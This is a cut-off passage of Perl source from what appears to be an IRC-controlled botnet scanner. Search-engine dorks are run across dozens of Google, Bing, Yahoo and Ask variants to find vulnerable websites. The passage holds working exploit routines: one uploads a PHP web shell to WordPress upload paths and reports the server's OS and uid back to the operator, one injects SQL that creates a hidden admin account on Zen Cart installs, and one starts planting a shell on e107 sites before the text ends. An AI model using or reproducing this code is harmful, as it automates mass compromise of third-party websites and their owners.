&type($chan,$bug,$nick,$dork,"JacKUK",$type); } exit; } } if ($engine =~ /jackus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKUS",$type); } exit; } } if ($engine =~ /jacksi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKSI",$type); } exit; } } if ($engine =~ /jackbe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKBE",$type); } exit; } } if ($engine =~ /jackbiz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKBIZ",$type); } exit; } } if ($engine =~ /jackby/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKBY",$type); } exit; } } if ($engine =~ /jackma/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKMA",$type); } exit; } } if ($engine =~ /jackal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKBA",$type); } exit; } } if ($engine =~ /jackws/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKAL",$type); } exit; } } if ($engine =~ /jackch/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKCH",$type); } exit; } } if ($engine =~ /jacklu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKLu",$type); } exit; } } if ($engine =~ /jackws/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKWS",$type); } exit; } } if ($engine =~ /jackdo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKDO",$type); } exit; } } if ($engine =~ /jackr1/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR1",$type); } exit; } } if ($engine =~ /jackr2/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR2",$type); } exit; } } if ($engine =~ /jackr3/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR3",$type); } exit; } } if ($engine =~ /jackr4/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR4",$type); } exit; } } if ($engine =~ /jackr5/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR5",$type); } exit; } } if ($engine =~ /jackr6/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR6",$type); } exit; } } if ($engine =~ /jackr7/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR7",$type); } exit; } } if ($engine =~ /jackr8/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR8",$type); } exit; } } if ($engine =~ /jackr9/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR9",$type); } exit; } } if ($engine =~ /jackr10/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR10",$type); } exit; } } if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLe",$type); } exit; } } if ($engine =~ /googleCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeCA",$type); } exit; } } if ($engine =~ /googleDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeDE",$type); } exit; } } if ($engine =~ /googleUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeUK",$type); } exit; } } if ($engine =~ /googleFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeFR",$type); } exit; } } if ($engine =~ /googleES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeES",$type); } exit; } } if ($engine =~ /googleIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeIT",$type); } exit; } } if ($engine =~ /googleNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeNL",$type); } exit; } } if ($engine =~ /googleBE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeBE",$type); } exit; } } if ($engine =~ /googleCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeCH",$type); } exit; } } if ($engine =~ /googleSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeSE",$type); } exit; } } if ($engine =~ /googleDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeDK",$type); } exit; } } if ($engine =~ /googleNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeNO",$type); } exit; } } if ($engine =~ /googleNZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeNZ",$type); } exit; } } if ($engine =~ /googleIE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeIE",$type); } exit; } } if ($engine =~ /googleBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeBR",$type); } exit; } } if ($engine =~ /googleAR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeAR",$type); } exit; } } if ($engine =~ /googleCO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeCO",$type); } exit; } } if ($engine =~ /googleCU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeCU",$type); } exit; } } if ($engine =~ /googleCL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeCL",$type); } exit; } } if ($engine =~ /googleMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeMX",$type); } exit; } } if ($engine =~ /googleAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeAU",$type); } exit; } } if ($engine =~ /googleRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeRU",$type); } exit; } } if ($engine =~ /googleAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeAT",$type); } exit; } } if ($engine =~ /googlePL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLePL",$type); } exit; } } if ($engine =~ /googleIL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeIL",$type); } exit; } } if ($engine =~ /googleTR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeTR",$type); } exit; } } if ($engine =~ /googleUA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeUA",$type); } exit; } } if ($engine =~ /googleGR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeGR",$type); } exit; } } if ($engine =~ /googleJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeJP",$type); } exit; } } if ($engine =~ /googleCN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeCN",$type); } exit; } } if ($engine =~ /googleMY/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeMY",$type); } exit; } } if ($engine =~ /googleTH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeTH",$type); } exit; } } if ($engine =~ /googleIN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeIN",$type); } exit; } } if ($engine =~ /googleKR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeKR",$type); } exit; } } if ($engine =~ /googleRO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeRO",$type); } exit; } } if ($engine =~ /googleTW/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeTW",$type); } exit; } } if ($engine =~ /googleZA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeZA",$type); } exit; } } if ($engine =~ /googlePT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLePT",$type); } exit; } } if ($engine =~ /googleBY/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeBY",$type); } exit; } } if ($engine =~ /googleSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeSE",$type); } exit; } } if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"Bing",$type); } exit; } } if ($engine =~ /bingDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingDE",$type); } exit; } } if ($engine =~ /bingUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingUK",$type); } exit; } } if ($engine =~ /bingCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingCA",$type); } exit; } } if ($engine =~ /bingBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingBR",$type); } exit; } } if ($engine =~ /bingFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingFR",$type); } exit; } } if ($engine =~ /bingES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingES",$type); } exit; } } if ($engine =~ /bingIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingIT",$type); } exit; } } if ($engine =~ /bingBE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingBE",$type); } exit; } } if ($engine =~ /bingNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingNL",$type); } exit; } } if ($engine =~ /bingPT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingPT",$type); } exit; } } if ($engine =~ /bingNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingNO",$type); } exit; } } if ($engine =~ /bingDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingDK",$type); } exit; } } if ($engine =~ /bingSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingSE",$type); } exit; } } if ($engine =~ /bingCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingCH",$type); } exit; } } if ($engine =~ /bingNZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingNZ",$type); } exit; } } if ($engine =~ /bingRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingRU",$type); } exit; } } if ($engine =~ /bingJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingJP",$type); } exit; } } if ($engine =~ /bingCN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingCN",$type); } exit; } } if ($engine =~ /bingKR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingKR",$type); } exit; } } if ($engine =~ /bingMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingMX",$type); } exit; } } if ($engine =~ /bingAR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingAR",$type); } exit; } } if ($engine =~ /bingCL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingCL",$type); } exit; } } if ($engine =~ /bingAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingAU",$type); } exit; } } if ($engine =~ /biglobe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BigLobe",$type); } exit; } } if ($engine =~ /walla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"WaLLa",$type); } exit; } } if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YaHoo",$type); } exit; } } if ($engine =~ /yahooCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoCA",$type); } exit; } } if ($engine =~ /yahooUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoUK",$type); } exit; } } if ($engine =~ /yahooDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoDE",$type); } exit; } } if ($engine =~ /yahooFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoFR",$type); } exit; } } if ($engine =~ /yahooES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoES",$type); } exit; } } if ($engine =~ /yahooIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoIT",$type); } exit; } } if ($engine =~ /yahooHK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoHK",$type); } exit; } } if ($engine =~ /yahooID/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoID",$type); } exit; } } if ($engine =~ /yahooIN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoIN",$type); } exit; } } if ($engine =~ /yahooAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoAU",$type); } exit; } } if ($engine =~ /yahooMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoMX",$type); } exit; } } if ($engine =~ /yahooTW/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoTW",$type); } exit; } } if ($engine =~ /yahooBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoBR",$type); } exit; } } if ($engine =~ /yahooAR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoAR",$type); } exit; } } if ($engine =~ /yahooNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoNL",$type); } exit; } } if ($engine =~ /yahooDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoDK",$type); } exit; } } if ($engine =~ /yahooPH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoPH",$type); } exit; } } if ($engine =~ /yahooCL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoCL",$type); } exit; } } if ($engine =~ /yahooRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoRU",$type); } exit; } } if ($engine =~ /yahooCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoCH",$type); } exit; } } if ($engine =~ /yahooCO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoCO",$type); } exit; } } if ($engine =~ /yahooFI/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoFI",$type); } exit; } } if ($engine =~ /yahooRO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoRO",$type); } exit; } } if ($engine =~ /yahooVE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoVE",$type); } exit; } } if ($engine =~ /yahooAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoAT",$type); } exit; } } if ($engine =~ /yahooPL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoPL",$type); } exit; } } if ($engine =~ /yahooKR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoKR",$type); } exit; } } if ($engine =~ /yahooNZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoNZ",$type); } exit; } } if ($engine =~ /yahooGR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoGR",$type); } exit; } } if ($engine =~ /yahooPE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoPE",$type); } exit; } } if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsK",$type); } exit; } } if ($engine =~ /askCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKCA",$type); } exit; } } if ($engine =~ /askDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKDE",$type); } exit; } } if ($engine =~ /askIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKIT",$type); } exit; } } if ($engine =~ /askFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKFR",$type); } exit; } } if ($engine =~ /askES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKES",$type); } exit; } } if ($engine =~ /askRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKRU",$type); } exit; } } if ($engine =~ /askNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKNL",$type); } exit; } } if ($engine =~ /askUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKUK",$type); } exit; } } if ($engine =~ /askBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKBR",$type); } exit; } } if ($engine =~ /askPL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKPL",$type); } exit; } } if ($engine =~ /askAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKAU",$type); } exit; } } if ($engine =~ /askAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKAT",$type); } exit; } } if ($engine =~ /askJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKJP",$type); } exit; } } if ($engine =~ /askSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKSE",$type); } exit; } } if ($engine =~ /askMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKMX",$type); } exit; } } if ($engine =~ /askNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKNO",$type); } exit; } } if ($engine =~ /askDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKDK",$type); } exit; } } if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"UoL",$type); } exit; } } if ($engine =~ /onet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"OnEt",$type); } exit; } } if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"CLusTy",$type); } exit; } } if ($engine =~ /sapo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"SaPo",$type); } exit; } } if ($engine =~ /aol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AoL",$type); } exit; } } if ($engine =~ /lycos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"LyCos",$type); } exit; } } if ($engine =~ /hotbot/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"HotBot",$type); } exit; } } if ($engine =~ /seznam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"SeZNam",$type); } exit; } } } ###### EXPLOITING ####### sub ffm_exploit() { my $chan = $_[0]; my $bugz = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$ffmlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$ffmlogo4$engine 9Finished 4for 9$dork "); } my $aplod = LWP::UserAgent->new; my $res = $aplod->post("http://".$site.$bugz,['file' => ['./xxx.php' => 'application/octet-stream'],'name' => 'xxx.php'],'Content-Type' => 'form-data'); my $hasil = $res->content; my $path = "wp-content/uploads/2013/10/xxx.php"; if ($hasil=~ /xxx.php/){ &msg("$chan","$ffmlogo4$engine 9e3x9p3l9o3i9t3i9n3g 4http://$site "); my $test = "http://".$site.$path; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $cekap = &get_content($test); if ($cekap =~ /UnKnown - Simple Shell/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$nick","$ffmlogo4$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test4 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$ffmlogo4$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test4 (SafeMode=$safe) (OS=$os) uid=$uid "); } } exit; } } } } } sub zen_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zenlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$zenlogo4$engine 9Finished 4for 9$dork "); } my $test = "http://".$site.$bug; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /zc_install/){ &zen_query($chan,$site,$test,$engine); } } exit; } } } } sub zen_query() { my $chan = $_[0]; my $url = $_[1]; my $test = $_[2]; my $engine = $_[3]; my $code = "INSERT+INTO+admin+%28admin_id%2C+admin_name%2C+admin_email%2C+admin_pass%29+VALUES+%2856%2C%27adminsys%27%2C%27admin%40mazacrew.co.cc%27%2C%27617ec22fbb8f201c366e9848c0eb6925%3A87%27%29%3B"; my $req = HTTP::Request->new(POST => $test); $req->content_type("application/x-www-form-urlencoded"); $req->content("query_string=".$code); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(3); my $res = $ua->request($req); my $data = $res->as_string; if ( $data =~ /1 statements processed/i ) { &msg("$chan","$zenlogo4$engine 4<9=4>4 VulN 4<9=4>9 http://".$url."admin/login.php "); &msg("$admin","$zenlogo4$engine 4<9=4>4 VulN 4<9=4>9 http://".$url."admin/login.php "); } elsif ( $data =~ /Duplicate entry/i ) { &msg("$chan","$zenlogo4$engine 4<9=4>9 SuccesS 4<9=4>9 http://".$url."admin/login.php )"); &msg("$admin","$zenlogo4$engine 4<9=4>9 SuccesS 4<9=4>9 http://".$url."admin/login.php "); } } sub e107_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$e107logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$e107logo4$engine 9Finished 4for 9$dork "); } my $test = "http://".$site.$bug; my $shellz = "http://".$site."/images/lobex.php"; my $code = 